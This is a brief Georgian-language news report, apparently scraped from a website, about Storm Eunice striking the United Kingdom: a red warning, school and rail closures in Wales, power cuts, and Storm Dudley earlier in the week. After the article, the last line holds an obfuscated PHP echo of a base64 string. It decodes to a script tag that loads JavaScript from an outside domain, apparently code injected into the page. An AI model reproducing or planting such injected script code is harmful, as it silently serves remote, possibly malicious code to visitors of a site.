celsiusi
ავერსი საქკაბელი
გაერთიანებულ სამეფოს შტორმი „იუნისი“ დაატყდა თავს. ინფორმაციას „ბიბისი“ ავრცელებს.
 
სინოპტიკოსების პროგნოზით, ქარის სიჩქარემ შესაძლოა, საათში 145 კმ-ს მიაღწიოს. გამოცხადებულია განგაშის ყველაზე მაღალი, წითელი დონე, რაც სიცოცხლისთვის საშიშ გარემოებას გულისხმობს.
 
დღეს, უელსში დაიხურა საგანმანათლებლო დაწესებულებები და ფუნქციონირება შეწყვიტა რკინიგზამ. სტიქიამ აქ ელექტროგადამცემი ხაზები დააზიანა, რის გამოც 1 200-მდე ოჯახი ელექტროენერგიის გარეშეა დარჩენილი.
 
„იუნისი“ უკვე მეორე შტორმია, რომელიც გაერთიანებულ სამეფოს ამ კვირაში დაატყდა თავს. მანამდე, შოტლანდიას, ჩრდილოეთ ირლანდიასა და ინგლისის ჩრდილოეთ ნაწილს შტორმმა „დადლიმ“ გადაუარა. თუმცა, სინოპტიკოსების შეფასებით, „იუნისი“ ბოლო ათწლეულების განმავლობაში ქვეყანაზე დამტყდარი ყველაზე მძლავრი სტიქიაა.
 
 
907
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");